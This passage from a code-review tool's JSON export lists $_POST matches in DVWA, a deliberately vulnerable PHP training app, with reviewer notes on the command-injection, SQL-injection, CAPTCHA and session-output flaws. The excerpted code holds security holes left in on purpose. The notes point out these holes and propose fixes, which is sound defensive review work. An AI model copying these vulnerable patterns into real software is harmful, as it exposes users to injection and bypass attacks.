\n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> they did stage <span class=\"token number\">1</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'passed_captcha'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span 
class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$html</span>     <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>&lt;br />You have not passed the CAPTCHA.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 52,
  "start": 47,
  "end": 58,
  "severity": "unknown",
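  "note": "Line 55 decides whether the CAPTCHA was passed from the 'passed_captcha' POST field, which is supplied by the client; the result of step 1 should be recorded server-side (for example in the session) and checked there."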
 },
 {
  "id": 173,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
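  "note": "The branch is gated on $_POST['Submit'] but reads 'ip' from $_REQUEST (line 5), so the value is not limited to the POST body; line 7 indicates a blacklist follows, and validating the value against the expected address format is the more robust control."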
 },
 {
  "id": 177,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 183,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">)</span> {",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
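  "note": "Line 3 only checks that the form was submitted. Line 5 copies $_REQUEST['ip'] into $target with no validation, and the comment on line 7 says it feeds a ping command; the command call is outside this excerpt, so confirm how $target reaches it. The gate tests $_POST but the value is read from $_REQUEST, which can also be populated from the query string. If $target is concatenated into a shell command line, validate it as an IP address (filter_var with FILTER_VALIDATE_IP) and quote it with escapeshellarg()."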
 },
 {
  "id": 187,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
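  "note": "Line 3 only checks that the form was submitted. $target comes from $_REQUEST['ip'] on line 5 and line 7 starts a blacklist of substitutions; the list contents and the command call are outside this excerpt. A denylist of characters is hard to make complete, so validating the value against the expected IP address format (filter_var with FILTER_VALIDATE_IP) before any command use is the more reliable control."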
 },
 {
  "id": 236,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span>  <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> 
\"<span class=\"token operator\">&lt;</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;&lt;/script>\";</span>\n<span class=\"line-number\">16:</span> }",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 237,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span>  <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\">&lt;</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;&lt;/script>\";</span>\n<span class=\"line-number\">16:</span> 
}\n<span class=\"line-number\">17:</span> ",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
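  "note": "Line 12 stores $_POST['id'] in the session unchanged, and line 14 interpolates it into $page['body'] with no output encoding visible in this excerpt; if the body is emitted as HTML the value can carry markup into the rendered page. Code that later reads $_SESSION['id'] should treat it as client-controlled. Validate it as an integer before storing and pass it through htmlspecialchars() on output."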
 },
 {
  "id": 247,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 248,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token variable\">$id</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span 
class=\"line-number\">10:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span 
class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
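  "note": "Line 6 escapes $id with mysqli_real_escape_string(), but line 9 places $id in the WHERE clause without surrounding quotes, so escaping string metacharacters does not confine the value to a single literal. Use a prepared statement with a bound integer parameter, or reject non-numeric input before building the query. Line 10 also returns the mysqli_error() text to the client on failure, which discloses query details; log it server-side instead."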
 },
 {
  "id": 205,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Blind SQL Injection Cookie Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token 
variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'id'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Cookie ID set!&lt;br />&lt;br />&lt;br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\">&lt;</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;&lt;/script>\";</span>\n<span class=\"line-number\">15:</span> }\n<span 
class=\"line-number\">16:</span> ",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 206,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Blind SQL Injection Cookie Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span 